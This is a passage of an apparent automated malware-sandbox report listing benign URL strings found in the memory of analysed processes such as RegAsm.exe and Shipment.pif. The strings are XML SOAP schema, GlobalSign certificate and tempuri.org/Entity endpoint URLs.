Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequence
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessage
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns
Source: winmsbt.exe, 00000021.00000002.4712142699.0000000003031000.00000004.00000800.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 0000002A.00000002.4674057559.0000000002DE1000.00000004.00000800.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 0000002A.00000002.4674057559.0000000002E38000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty
Source: Shipment.pif, 0000000B.00000003.2056731275.00000000046B2000.00000004.00000800.00020000.00000000.sdmp, Shipment.pif.1.dr, GuardTrack.scr.11.dr, Scottish.0.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: Shipment.pif, 0000000B.00000003.2056731275.00000000046B2000.00000004.00000800.00020000.00000000.sdmp, Shipment.pif.1.dr, GuardTrack.scr.11.dr, Scottish.0.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Ent
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id1
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id10
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id10LRjq$
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id10Response
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id10Responsex
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id11
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id11LRjq
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id11Response
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id11Responsex
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id12
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id12LRjq
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id12Response
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id12Responsex
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id13
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id13LRjq
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id13Response
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id13Responsex
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id14
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id14LRjq
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id14Response
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id14Responsex
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id15
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id15LRjq
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id15Response
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id15Responsex
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id16
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id16LRjq
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id16Response
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id16Responsex
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id17
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id17LRjq
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id17Response
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id17Responsex
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id18
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id18LRjq
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id18Response
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id18Responsex
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id19
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id19LRjq$
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id19Response
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id19Responsex
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id1LRjq$
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id1Response
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id1Responsex
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id2
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id20
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id20LRjq
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id20Response
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id20Responsex
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id21
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id21LRjq(
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id21Response
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id21Responsex
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id22
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id22LRjqt
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id22Response
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id22Responsex
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id23
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id23LRjqp
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id23Response
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id23Responsex
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id24
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id24LRjq
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id24Response
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id24Responsex
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id2LRjq
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id2Response
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id2Responsex
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id3
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id3LRjq
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id3Response
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id3Responsex
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id4
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id4LRjq
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id4Response
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id4Responsex
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id5
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id5LRjq
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id5Response
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id5Responsex
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id6
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id6LRjq(
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id6Response
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id6Responsex
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id7
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id7LRjq
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id7Response
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id7Responsex
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id8
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id8LRjq
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id8Response
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id8Responsex
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id9
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id9LRjq
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id9Response
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id9Responsex
